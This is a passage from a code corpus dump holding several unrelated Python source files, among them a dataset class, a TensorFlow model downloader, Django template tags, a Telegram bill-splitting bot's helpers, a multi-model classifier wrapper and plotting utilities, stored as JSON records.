function \"\"\"\n if self.default_load():\n self.should_save = False\n return True\n if self.invoke_load():\n self.should_save = True\n return True\n return False\n\n def preprocess(self):\n ret = self.invoke_preprocess()\n if ret:\n return ret\n # We provide a default implementation\n if self.is_use_default_preprocess:\n return self.default_preprocess()\n return False\n\n def reset(self, soft=False):\n \"\"\" Reset fields \"\"\"\n self.dataset = None\n self.dataset_test = None\n self.dataset_train = None\n self.dataset_validate = None\n self.operations_done = set()\n if not soft:\n self.dataset_xy = InOut(None, None)\n self.dataset_test_xy = InOut(None, None)\n self.dataset_train_xy = InOut(None, None)\n self.dataset_validate_xy = InOut(None, None)\n self.operations = DATASET_OPS\n self.outputs = list()\n self.should_save = False\n\n def save(self):\n \"\"\" Try to save dataset, first use user defined function otherwise save to pickle otherwise\"\"\"\n if self.do_not_save:\n return False\n return True if self.invoke_save() else self.default_save()\n\n def split(self):\n \" Split dataset into train, test, validate \"\n ret = self.invoke_split()\n if ret:\n self._debug(f\"Split invoked: {self.memory()}\")\n return ret\n # We provide a default implementation for dataset_split\n if self.is_use_default_split:\n ret = self.default_split()\n self._debug(f\"Split default result {ret}: {self.memory()}\")\n return ret\n return False\n\n def split_idx(self, idx_train, idx_validate, idx_test=None):\n \"\"\" Split dataset using an index list / array \"\"\"\n len_test = len(idx_test) if idx_test is not None else 0\n len_validate = len(idx_validate) if idx_validate is not None else 0\n self._debug(f\"Split dataset by idx. Lengths, train: {len(idx_train)}, validate: {len(idx_validate)}, test:{len_test}\")\n self.dataset_train = self[idx_train]\n if len_validate > 0:\n self.dataset_validate = self[idx_validate]\n if len_test > 0:\n self.dataset_test = self[idx_test]\n self.in_outs()\n return True\n","sub_path":"src/logml/datasets/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":13043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"68763124","text":"import os\nimport shutil\nimport tarfile\nimport urllib.request as urllib\n\nfrom settings import model_dir\n\ndef download_od_model():\n \"\"\"\n Downloads a mobile model from the Tensorflow model zoo and prepares it for usage in\n Tensorflow Serving.\n \"\"\"\n model_name = 'ssd_mobilenet_v2_coco_2018_03_29'\n fname = '{}.tar.gz'.format(model_name)\n url = \"http://download.tensorflow.org/models/object_detection/{}\".format(fname)\n mobile_dir = os.path.join(model_dir, model_name)\n\n if not os.path.exists(mobile_dir):\n os.mkdir(mobile_dir)\n file = urllib.URLopener()\n file.retrieve(url, fname)\n\n tar = tarfile.open(fname, \"r:gz\")\n tar.extractall('models')\n tar.close()\n os.remove(fname)\n\n checkpoint_dir = os.path.join(mobile_dir, '1')\n os.rename(os.path.join(mobile_dir, 'saved_model'), checkpoint_dir)\n shutil.move(os.path.join(mobile_dir, 'checkpoint'),\n os.path.join(checkpoint_dir, 'checkpoint'))\n shutil.move(os.path.join(mobile_dir, 'frozen_inference_graph.pb'),\n os.path.join(checkpoint_dir, 'frozen_inference_graph.pb'))\n shutil.move(os.path.join(mobile_dir, 'model.ckpt.data-00000-of-00001'),\n os.path.join(checkpoint_dir, 'model.ckpt.data-00000-of-00001'))\n shutil.move(os.path.join(mobile_dir, 'model.ckpt.index'),\n os.path.join(checkpoint_dir, 'model.ckpt.index'))\n shutil.move(os.path.join(mobile_dir, 'model.ckpt.meta'),\n os.path.join(checkpoint_dir, 'model.ckpt.meta'))\n shutil.move(os.path.join(mobile_dir, 'pipeline.config'),\n os.path.join(checkpoint_dir, 'pipeline.config'))\n\nif __name__ == '__main__':\n download_od_model()\n","sub_path":"object_detector/download_od_model.py","file_name":"download_od_model.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"380389817","text":"\n# simpypatch1.py\n# \n# Instrument the step() method a little more to get useful information\n# out of errors in the events. The \"raise exc\" line fails 100% of the\n# time without revealing anything about the problem; all we get is \n# \"not enough arguments for format string.\"\n\n\ndef step(self):\n \"\"\"Process the next event.\n\n Raise an :exc:`EmptySchedule` if no further events are available.\n\n \"\"\"\n print(\"\\nENTERING step:\")\n try:\n self._now, _, _, event = heappop(self._queue)\n print(\"now:\", self._now, \"event:\", event)\n except IndexError:\n raise EmptySchedule()\n\n # Process callbacks of the event. Set the events callbacks to None\n # immediately to prevent concurrent modifications.\n callbacks, event.callbacks = event.callbacks, None\n print(\"callbacks:\", callbacks)\n for callback in callbacks:\n callback(event)\n\n print(\"event.ok\", event.ok)\n if not event.ok and not hasattr(event, 'defused'):\n # The event has failed and has not been defused. Crash the\n # environment.\n # Create a copy of the failure exception with a new traceback.\n exc = type(event._value)(*event._value.args)\n exc.__cause__ = event._value\n raise exc\n\nfrom simpy import Environment\nfrom heapq import heappush, heappop\n\nEnvironment.step = step\n\n\n","sub_path":"shelf/simpypatch1.py","file_name":"simpypatch1.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"525052593","text":"from util import *\n\n\n@apply\ndef apply(given):\n n = given.of(Equal[Expr % 2, 0])\n return Equal((-1) ** n, 1)\n\n\n@prove\ndef prove(Eq):\n from axiom import algebra\n# n = q * d + r\n n = Symbol(integer=True, given=True)\n\n Eq << apply(Equal(n % 2, 0))\n\n Eq << ~Eq[0]\n\n Eq << algebra.mod_ne_zero.imply.is_odd.apply(Eq[-1])\n\n Eq << algebra.is_odd.imply.eq.pow.apply(Eq[-1])\n\n Eq <<= Eq[-1] & Eq[1]\n\n\nif __name__ == '__main__':\n run()\n# created on 2019-10-10\n","sub_path":"axiom/algebra/is_even/given/eq.py","file_name":"eq.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"529372979","text":"from django import template\n\nimport random\nimport markdown2\nimport string\n\nfrom minerals.models import Mineral\n\n\nregister = template.Library()\n\n\n@register.inclusion_tag('minerals/logo_header.html')\ndef logo_header():\n \"\"\"Displays the logo and header for the website\"\"\"\n return {}\n\n\n@register.inclusion_tag('minerals/random_mineral.html')\ndef random_mineral():\n return {\"mineral\": random.choice(Mineral.objects.all())}\n\n\n@register.filter('markdown_to_html')\ndef markdown_to_html(markdown_text):\n \"\"\"Converts markdown text to HTML\"\"\"\n html_body = markdown2.markdown(markdown_text)\n return html_body\n\n\n@register.inclusion_tag('minerals/alpha_nav.html')\ndef alpha_nav(current):\n alpha_list = [x for x in string.ascii_uppercase]\n return {'alpha_list': alpha_list, 'current': current}\n\n\n@register.inclusion_tag('minerals/group_nav.html')\ndef group_search(current):\n groups = [\n 'silicates',\n 'oxides',\n 'sulfates',\n 'sulfides',\n 'carbonates',\n 'halides',\n 'sulfosalts',\n 'phosphates',\n 'borates',\n 'organic',\n 'arsenates',\n 'native',\n 'other']\n\n return {'groups': groups, 'current': current}\n\n\n\n","sub_path":"minerals/templatetags/mineral_extras.py","file_name":"mineral_extras.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"619084291","text":"from django.conf.urls import url\nfrom . import views\nimport django.contrib.auth.views as djangoviews\n\n\nurlpatterns = [\n url(r'^$', views.post_list, name='post_list'),\n url(r'^post/(?P\\d+)/$', views.post_detail, name='post_detail'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P\\d+)/edit/$', views.post_edit, name='post_edit'),\n\n url(r'^post/(?P\\d+)/comment/$', views.add_comment_to_post, name='add_comment_to_post'),\n url(r'^comment/(?P\\d+)/approve/$', views.comment_approve, name='comment_approve'),\n url(r'^comment/(?P\\d+)/remove/$', views.comment_remove, name='comment_remove'),\n\n url(r'^accounts/login/$', djangoviews.login, name='login'),\n url(r'^accounts/logout/$', djangoviews.logout, name='logout', kwargs={'next_page': '/'}),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62900722","text":"import os, shutil\r\n\r\nlistOfFiles = [] \r\nwith open(r'example\\Desktop\\list.txt') as listDocument:\r\n for row in listDocument:\r\n listOfFiles.append(row)\r\n\r\nfor root, dirs, files in os.walk(r'\\\\example\\directory\\images\\old'):\r\n for _file in files:\r\n if _file + '\\n' in listOfFiles:\r\n print\r\n 'Found file in: ' + str(root)\r\n shutil.copy(os.path.abspath(root + '/' + _file), r'\\\\example\\directory\\images\\new')\r\n else:\r\n print (\"file: {}\".format(_file))\r\n","sub_path":"FileCopy/copier.py","file_name":"copier.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"24015502","text":"from email.mime import text\nfrom datetime import *\nfrom google.cloud import vision\nimport pytz\nimport logging\nimport os\nfrom tokenize import String, group\nfrom .gcloudparser import GcloudParser\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\n\nfrom uuid import uuid4\nfrom telegram.utils.helpers import escape_markdown\nfrom telegram.ext import InlineQueryHandler, Updater, CommandHandler, CallbackQueryHandler, CallbackContext, Filters, MessageHandler\nfrom telegram import Chat, Message, Bot, InlineQueryResultArticle, ParseMode, InputTextMessageContent, InlineKeyboardButton, InlineKeyboardMarkup, Update, replymarkup\n\nfrom .bot_sql_integration import *\n\n\nTOKEN = os.environ['API_TOKEN']\n# os.environ['GOOGLE_APPLICATION_CREDENTIALS']=r'gcloudkey.json'\ntz = pytz.timezone('Asia/Singapore')\nnow = datetime.now(tz) # the current time in your local timezone\n\ndef inlineQueryHelper(update):\n \"\"\"Helps to provide the display text for the inline query pop-up\"\"\"\n query =removeCrustFromString(update.inline_query.query)\n\n if len(query) > 44:\n return [\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=query + \" is too long for an order name.\",\n input_message_content=InputTextMessageContent(\n \"Trying to create order with invalid name: \" + query + \"\\n\\nPlease key in a valid order name to start splitting!\"\n ),\n thumb_url='https://res.cloudinary.com/jianoway/image/upload/b_rgb:ffffff/v1621962567/icons8-cross-mark-96_zrk1p9.png',\n ),\n ]\n\n if '\\n' in query or 'New Order:' in query:\n return [\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=query + \" is not a valid order name.\",\n input_message_content=InputTextMessageContent(\n \"Trying to create order with invalid name: \" + query + \"\\n\\nPlease key in a valid order name to start splitting!\"\n ),\n thumb_url='https://res.cloudinary.com/jianoway/image/upload/b_rgb:ffffff/v1621962567/icons8-cross-mark-96_zrk1p9.png',\n ),\n ]\n\n return [\n InlineQueryResultArticle(\n id = str(uuid4()),\n title = \"Create new order: \" + query,\n input_message_content=InputTextMessageContent(\n \"New Order: \" + query\n ),\n thumb_url='https://res.cloudinary.com/jianoway/image/upload/b_rgb:ffffff/v1621962373/icons8-user-groups-100_nxolfi.png',\n )\n ]\n\ndef formatListOfUsernames(usernameList):\n str = ''\n for username in usernameList:\n str += '\\n@' + username\n return str\n\ndef waitingForUserToChooseSplitKeyboardMarkup():\n keyboard = [\n [\n InlineKeyboardButton(\"Unevenly\", callback_data=\"newordersplitunevenly\"),\n InlineKeyboardButton(\"Evenly\", callback_data=\"newordersplitevenly\")\n ]\n ]\n return InlineKeyboardMarkup(keyboard)\n\ndef splitEvenlyFinalisedKeyboardMarkup():\n keyboard = [\n [\n InlineKeyboardButton(\"I've paid!\", callback_data='debtorEvenlyPaid'),\n InlineKeyboardButton(\"I've not paid!\", callback_data='debtorEvenlyUnpaid')\n ],\n # [\n # InlineKeyboardButton(\"Mark as settled\", callback_data='markAsSettled')\n # ]\n ]\n return InlineKeyboardMarkup(keyboard)\n\ndef splitUnevenlyFinalisedKeyboardMarkup():\n keyboard = [\n [\n InlineKeyboardButton(\"I've paid!\", callback_data='debtorUnevenlyPaid'),\n InlineKeyboardButton(\"I've not paid!\", callback_data='debtorUnevenlyUnpaid')\n ],\n # [\n # InlineKeyboardButton(\"Mark as settled\", callback_data='markAsSettled')\n # ]\n ]\n return InlineKeyboardMarkup(keyboard)\n\ndef splitUnevenlyKeyboardMarkup(groupID, last):\n keyboardHolder = []\n buttonToFinalise = None\n\n if last:\n serviceChargeButton = InlineKeyboardButton(\"Service Charge?\", callback_data=\"servicechargecallbackdata\")\n GSTButton = InlineKeyboardButton(\"GST?\", callback_data=\"goodservicetax\")\n keyboardHolder.append([serviceChargeButton, GSTButton])\n buttonToFinalise = InlineKeyboardButton(\"Create Order\", callback_data='splitunevenlyfinalise')\n else:\n users = getAllUsersFromGroup(groupID)\n for user in users:\n firstname = getFirstName(user)\n username = getUsername(user)\n firstNameWithUsername = firstname + \" (@\" + username + \")\"\n callback_data = 'splitunevenlycallbackdata' + '%s' % user \n keyboardHolder.append([InlineKeyboardButton(firstNameWithUsername, callback_data=callback_data)])\n addEveryone = InlineKeyboardButton(\"Add Everyone!\", callback_data='splitunevenlyaddeveryonecallbackdata')\n \n keyboardHolder.append([addEveryone])\n buttonToFinalise = InlineKeyboardButton(\"Next Item\", callback_data='splitunevenlynextitem')\n \n keyboardHolder.append([buttonToFinalise])\n return InlineKeyboardMarkup(keyboardHolder)\n\n\ndef splitEvenlyKeyboardMarkup(groupID):\n keyboardHolder = []\n\n users = getAllUsersFromGroup(groupID)\n\n for user in users:\n firstname = getFirstName(user)\n username = getUsername(user)\n firstNameWithUsername = firstname + \" (@\" + username + \")\"\n callback_data = 'splitevenlycallbackdata' + '%s' % user\n keyboardHolder.append([InlineKeyboardButton(firstNameWithUsername, callback_data=callback_data)])\n\n addEveryone = InlineKeyboardButton(\"Add Everyone!\", callback_data='splitevenlyaddeveryonecallbackdata')\n buttonToFinalise = InlineKeyboardButton(\"Create Order\", callback_data='SplitEvenlyFinalise')\n keyboardHolder.append([addEveryone])\n keyboardHolder.append([buttonToFinalise])\n\n return InlineKeyboardMarkup(keyboardHolder)\n \ndef receiptParser(url):\n client = vision.ImageAnnotatorClient()\n with BytesIO() as output:\n with Image.open(requests.get(\"%s\" % url, stream=True).raw) as img:\n img.save(output, 'BMP')\n content = output.getvalue()\n image = vision.Image(content = content)\n response = client.text_detection(image=image)\n parser = GcloudParser(debug=False)\n articles, dates, markets = parser.parse_response(response)\n formattedString = \"\"\n for article in articles:\n name = article[\"name\"]\n price = article[\"price\"]\n tempStr = \"%s - $%s\\n\" % (name, price)\n formattedString += tempStr\n return formattedString\n\n\ndef removeUUIDDashes(uuid):\n return \"\".join(str(uuid).split(\"-\"))\n\ndef removeUsernameFromDebtMessage(username, text):\n usernameWithTag = '@' + str(username)\n text = text\n if usernameWithTag in text:\n text = text.replace('\\n' + usernameWithTag, '', 1)\n return text\n\ndef addUsernameToDebtMessage(username, text):\n usernameWithTag = '@' + str(username)\n text = text\n if usernameWithTag not in text:\n text += '\\n' + usernameWithTag\n return text\n\ndef takeSecond(element):\n return element[1]\n\ndef formatTransactionsForCreditorKeyboardMarkup(transactions):\n if len(transactions) < 1:\n return\n print(transactions)\n \n firstTransaction = transactions[0]\n currentOrderID = firstTransaction[1]\n date = getOrderDateFromOrderID(currentOrderID)\n formattedDate = date.strftime(\"%d %B %Y\")\n currentOrderName = getOrderNameFromOrderID(currentOrderID)\n currentGroupID = getGroupIDFromOrder(currentOrderID)\n currentGroupName = getGroupNameFromGroupID(currentGroupID)\n keyboardHolder = []\n keyboardHolder.append([InlineKeyboardButton('Order: %s %s (%s)' % (currentOrderName, formattedDate, currentGroupName), callback_data='null')])\n\n for transaction in transactions:\n transactionID = transaction[0]\n transactionOrderID = transaction[1]\n if transactionOrderID != currentOrderID:\n currentOrderID = transactionOrderID\n currentGroupID = getGroupIDFromOrder(currentOrderID)\n currentGroupName = getGroupNameFromGroupID(currentGroupID)\n date = getOrderDateFromOrderID(currentOrderID)\n formattedDate = date.strftime(\"%d %B %Y\")\n currentOrderName = getOrderNameFromOrderID(currentOrderID)\n keyboardHolder.append([InlineKeyboardButton('Order: %s %s (%s)' % (currentOrderName, formattedDate, currentGroupName), callback_data='null')])\n \n debtorID = transaction[2]\n amountOwed = getFormattedAmountFromString(transaction[3])\n debtorUsername = getUsername(debtorID)\n debtorName = getFirstName(debtorID)\n tempKeyboard = [\n InlineKeyboardButton('%s' % debtorName, callback_data='null'),\n InlineKeyboardButton('@%s' % debtorUsername, callback_data='null'),\n InlineKeyboardButton('$%s' % amountOwed, callback_data='null'),\n InlineKeyboardButton('Notify', callback_data=\"notifydebtorcallbackdata%s\" % transactionID),\n InlineKeyboardButton('Settle', callback_data=\"settledebtforcreditor%s\" % transactionID)\n ]\n keyboardHolder.append(tempKeyboard)\n \n return InlineKeyboardMarkup(keyboardHolder)\n\ndef formatTransactionsForDebtorKeyboardMarkup(transactions):\n \n if len(transactions) < 1:\n return\n \n firstTransaction = transactions[0]\n currentOrderID = firstTransaction[1]\n date = getOrderDateFromOrderID(currentOrderID)\n formattedDate = date.strftime(\"%d %B %Y\")\n currentOrderName = getOrderNameFromOrderID(currentOrderID)\n currentGroupID = getGroupIDFromOrder(currentOrderID)\n currentGroupName = getGroupNameFromGroupID(currentGroupID)\n keyboardHolder = []\n keyboardHolder.append([InlineKeyboardButton('Order: %s %s (%s)' % (currentOrderName, formattedDate, currentGroupName), callback_data='null')])\n for transaction in transactions:\n transactionID = transaction[0]\n transactionOrderID = transaction[1]\n if transactionOrderID != currentOrderID:\n currentOrderID = transactionOrderID\n currentGroupID = getGroupIDFromOrder(currentOrderID)\n currentGroupName = getGroupNameFromGroupID(currentGroupID)\n date = getOrderDateFromOrderID(currentOrderID)\n formattedDate = date.strftime(\"%d %B %Y\")\n currentOrderName = getOrderNameFromOrderID(currentOrderID)\n keyboardHolder.append([InlineKeyboardButton('Order: %s %s (%s)' % (currentOrderName, formattedDate, currentGroupName), callback_data='null')])\n \n creditorID = transaction[2]\n amountOwed = getFormattedAmountFromString(transaction[3])\n creditorUsername = getUsername(creditorID)\n creditorName = getFirstName(creditorID)\n tempKeyboard = [\n InlineKeyboardButton('%s' % creditorName, callback_data='null'),\n InlineKeyboardButton('@%s' % creditorUsername, callback_data='null'),\n InlineKeyboardButton('$%s' % amountOwed, callback_data='null'),\n InlineKeyboardButton('Settle', callback_data=\"settledebtfordebtor%s\" % transactionID)\n ]\n keyboardHolder.append(tempKeyboard)\n \n return InlineKeyboardMarkup(keyboardHolder)\n\ndef removeCrustFromString(str):\n return str.rstrip().lstrip()\n\ndef isValidAmount(amt):\n temp = amt.replace('.', '', 1)\n if len(temp) < 1:\n return False\n else:\n if temp[0] == '$':\n temp = temp.replace('$', '', 1)\n return temp.isdigit()\n\ndef getFormattedAmountFromString(amt):\n newAmt = amt\n if isinstance(newAmt, str):\n newAmt = newAmt.replace(\"$\", \"\", 1)\n tempAmt = float(float(newAmt) + float(0.005))\n strAmt = str(tempAmt)\n decimalPosition = strAmt.find('.')\n temp = list(strAmt)\n strToReturn = ''\n if float(strAmt) == 0:\n return '0.00'\n if decimalPosition == -1:\n for digit in temp:\n if digit == '0' and strToReturn == '':\n continue\n else:\n strToReturn = strToReturn + digit\n strToReturn = strToReturn + '.00'\n else:\n counter = -1\n for digit in temp:\n counter += 1\n if counter > decimalPosition + 2:\n return strToReturn\n if digit == '0' and strToReturn == '' and counter != decimalPosition - 1:\n continue\n else:\n strToReturn = strToReturn + digit\n if counter == decimalPosition + 1:\n strToReturn = strToReturn + '0'\n if strToReturn.endswith('.'):\n strToReturn = strToReturn + '00'\n return strToReturn\n\ndef itemListToString(itemList):\n listStr = ''\n for item in itemList:\n print(item)\n listStr += '\\n' + item[0] + ' ('\n listStr += '$' + item[1] + ')'\n return listStr \n\n# removeUsernameFromSplitAllEvenlyDebtMessage('testuser1', '6a39016c-cd25-11eb-955c-acde48001122')\nclass Order:\n def __init__(self, orderID, groupID, orderName, orderAmount, creditorID, date):\n self.orderID = orderID\n self.groupID = groupID\n self.orderName = orderName\n self.orderAmount = orderAmount\n self.creditorID = creditorID\n self.date = date\n\nclass UsersAndSplitAmount:\n def __init__(self, users, splitAmount):\n self.users = users\n self.splitAmount = splitAmount\n \nclass Transaction:\n def __init__(self, transaction_id, orderID, splitAmount, creditorID, userID):\n self.transaction_id = transaction_id\n self.orderID = orderID,\n self.splitAmount = splitAmount\n self.creditorID = creditorID\n self.userID = userID\n\n","sub_path":"HELPME/helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":13629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"236323069","text":"import abc\r\nfrom onepiecepredictor.MultiModelsPredictor import MultiModelsPredictor\r\nfrom onepiecepredictor.OnePieceClassifier import OnePieceClassifier\r\n\r\nclass MultiModelsClassifier(MultiModelsPredictor):\r\n \"\"\"\r\n For Comparing multiple classification models performance with cross validation and stratified splitting of data if required.\r\n\r\n X -> array-like(supported by Sklearn). If testTrainSplit is passed, this will be split into train and test\r\n Y -> array-like(supported by Sklearn). If testTrainSplit is passed, this will be split into train and test\r\n testX -> array-like(supported by Sklearn), test data. Ignored if testTrainSplit is passed\r\n testY -> array-like(supported by Sklearn), test data. Ignored if testTrainSplit is passed\r\n testTrainSplit -> float, ratio passed will be the amount of test data.\r\n stratify -> bool, used to perform stratified splitting. If passed data will be split based on Y.\r\n performCV -> bool, Used when hyperParams not passed to perform plain CV.\r\n folds -> int, No of folds to be used for CV.\r\n applySmote -> bool, To apply smote to oversample the data. Pass only one of applySmote or underSample\r\n underSample -> bool, To randomly undersample the majority data.\r\n sampling -> str, Values supported by SMOTE, RandomUnderSampler classes in imblearn library.\r\n scoring -> str, Evaluation metric. Currently supported values: accuracy,balanced_accuracy,f1,precision,recall,roc_auc. If not passed accuracy is used.\r\n targetEncodeCols -> List. List of columns to target encode.\r\n multiClass -> Pass true in case of multiclass classification.\r\n \"\"\"\r\n\r\n def __init__(self, X, Y, testX = None, testY = None,testTrainSplit = None,\r\n folds = 5, scoring = None, performCV = None, targetEncodeCols = None,\r\n applySmote=False, underSample=False, sampling=None, stratify=None, multiClass = False\r\n ):\r\n self.multiClass = multiClass\r\n self.applySmote = applySmote\r\n self.sampling = sampling\r\n self.stratify = stratify\r\n self.underSample = underSample\r\n super().__init__(X=X, Y=Y, testX=testX, testY=testY, testTrainSplit=testTrainSplit,\r\n folds=folds, scoring=scoring, performCV=performCV, targetEncodeCols=targetEncodeCols\r\n )\r\n\r\n def predict(self):\r\n \"\"\"\r\n Returns dictionary with keys as Models and Values as metric scores.\r\n \"\"\"\r\n dummyRef = OnePieceClassifier(X = self.X, Y = self.Y, model = \"LOGISTIC\", modelParams = None,testTrainSplit = self.testTrainSplit,\r\n testX = self.testX, testY = self.testY,folds = self.folds, scoring = self.scoring, performCV = self.performCV,\r\n targetEncodeCols = self.targetEncodeCols, applySmote = self.applySmote, underSample = self.underSample,\r\n sampling = self.sampling, stratify = self.stratify, multiClass = self.multiClass)\r\n\r\n tempX = dummyRef.trainX\r\n tempY = dummyRef.trainY\r\n tempTestX = dummyRef.testX\r\n tempTestY = dummyRef.testY\r\n\r\n classifiers = [\"LOGISTIC\",\"RF\",\"SVM\",\"KNN\",\"ADABOOST\",\"XGBOOST\",\"CATBOOST\"]\r\n resultsDict = {}\r\n for classifier in classifiers:\r\n op = OnePieceClassifier(X = tempX, Y = tempY, model = classifier, modelParams = None, testTrainSplit = None,\r\n testX = tempTestX, testY = tempTestY, folds = self.folds, scoring = self.scoring, performCV = self.performCV,\r\n targetEncodeCols = None, applySmote = False, underSample = False,\r\n sampling = None, stratify = False, multiClass = self.multiClass)\r\n\r\n op.fit()\r\n score, preds = op.predict()\r\n resultsDict[classifier] = score\r\n\r\n del op\r\n\r\n return resultsDict\r\n\r\n\r\n\r\n","sub_path":"build/lib/onepiecepredictor/MultiModelsClassifier.py","file_name":"MultiModelsClassifier.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"356941712","text":"#\n# Copyright (c) The acados authors.\n#\n# This file is part of acados.\n#\n# The 2-Clause BSD License\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.;\n#\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom acados_template import latexify_plot\n\n\ndef plot_pendulum(shooting_nodes, u_max, U, X_true, X_est=None, Y_measured=None, latexify=False, plt_show=True, X_true_label=None):\n \"\"\"\n Params:\n shooting_nodes: time values of the discretization\n u_max: maximum absolute value of u\n U: arrray with shape (N_sim-1, nu) or (N_sim, nu)\n X_true: arrray with shape (N_sim, nx)\n X_est: arrray with shape (N_sim-N_mhe, nx)\n Y_measured: array with shape (N_sim, ny)\n latexify: latex style plots\n \"\"\"\n\n if latexify:\n latexify_plot()\n\n WITH_ESTIMATION = X_est is not None and Y_measured is not None\n\n N_sim = X_true.shape[0]\n nx = X_true.shape[1]\n\n Tf = shooting_nodes[N_sim-1]\n t = shooting_nodes\n\n Ts = t[1] - t[0]\n if WITH_ESTIMATION:\n N_mhe = N_sim - X_est.shape[0]\n t_mhe = np.linspace(N_mhe * Ts, Tf, N_sim-N_mhe)\n\n plt.subplot(nx+1, 1, 1)\n line, = plt.step(t, np.append([U[0]], U))\n if X_true_label is not None:\n line.set_label(X_true_label)\n else:\n line.set_color('r')\n\n plt.ylabel('$u$')\n plt.xlabel('$t$')\n plt.hlines(u_max, t[0], t[-1], linestyles='dashed', alpha=0.7)\n plt.hlines(-u_max, t[0], t[-1], linestyles='dashed', alpha=0.7)\n plt.ylim([-1.2*u_max, 1.2*u_max])\n plt.xlim(t[0], t[-1])\n plt.grid()\n\n\n states_lables = ['$x$', r'$\\theta$', '$v$', r'$\\dot{\\theta}$']\n\n for i in range(nx):\n plt.subplot(nx+1, 1, i+2)\n line, = plt.plot(t, X_true[:, i], label='true')\n if X_true_label is not None:\n line.set_label(X_true_label)\n\n if WITH_ESTIMATION:\n plt.plot(t_mhe, X_est[:, i], '--', label='estimated')\n plt.plot(t, Y_measured[:, i], 'x', label='measured')\n\n plt.ylabel(states_lables[i])\n plt.xlabel('$t$')\n plt.grid()\n plt.legend(loc=1)\n plt.xlim(t[0], t[-1])\n\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, hspace=0.4)\n\n if plt_show:\n plt.show()\n","sub_path":"examples/acados_python/getting_started/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"626860931","text":"# ----------------------------------------------------------------------\n# Migrate SLAProfile threshold profiles\n# ----------------------------------------------------------------------\n# Copyright (C) 2007-2019 The NOC Project\n# See LICENSE for details\n# ----------------------------------------------------------------------\n\n# Python modules\nimport itertools\nimport operator\n\n# Third-party modules\nimport bson\nimport cachetools\n\n# NOC modules\nfrom noc.core.mongo.connection import get_db\nfrom noc.core.migration.base import BaseMigration\n\nSAVE_FIELDS = {\"_id\", \"metric_type\", \"enable_periodic\", \"enable_box\", \"is_stored\"}\n\n\nclass Migration(BaseMigration):\n _ac_cache = cachetools.TTLCache(maxsize=5, ttl=60)\n\n def migrate(self):\n current = itertools.count()\n db = self.mongo_db\n # Migrate profiles\n p_coll = db[\"noc.sla_profiles\"]\n tp_coll = db[\"thresholdprofiles\"]\n for doc in p_coll.find():\n metrics = doc.get(\"metrics\") or []\n changed = [m for m in metrics if self.has_thresholds(m)]\n if not changed and metrics:\n for metric in metrics:\n for f in set(metric) - SAVE_FIELDS:\n del metric[f]\n elif not changed:\n continue\n for n, metric in enumerate(changed):\n tp_id = bson.ObjectId()\n if metric.get(\"threshold_profile\"):\n # Extend existent threshold profile\n tp = tp_coll.find_one({\"_id\": metric[\"threshold_profile\"]})\n assert tp, \"Broken threshold profile\"\n tp[\"_id\"] = tp_id\n else:\n tp = {\"_id\": tp_id}\n # Fill profile\n tp[\"name\"] = \"sp-%05d-%03d\" % (next(current), n)\n tp[\"description\"] = \"Migrated for SLA profile '%s' metric '%s'\" % (\n doc[\"name\"],\n metric[\"metric_type\"],\n )\n tp[\"window_type\"] = metric.get(\"window_type\")\n tp[\"window\"] = metric.get(\"window\")\n tp[\"window_function\"] = metric.get(\"window_function\")\n tp[\"window_config\"] = metric.get(\"window_config\")\n # Build thresholds\n tp[\"thresholds\"] = []\n if metric.get(\"high_error\", False):\n 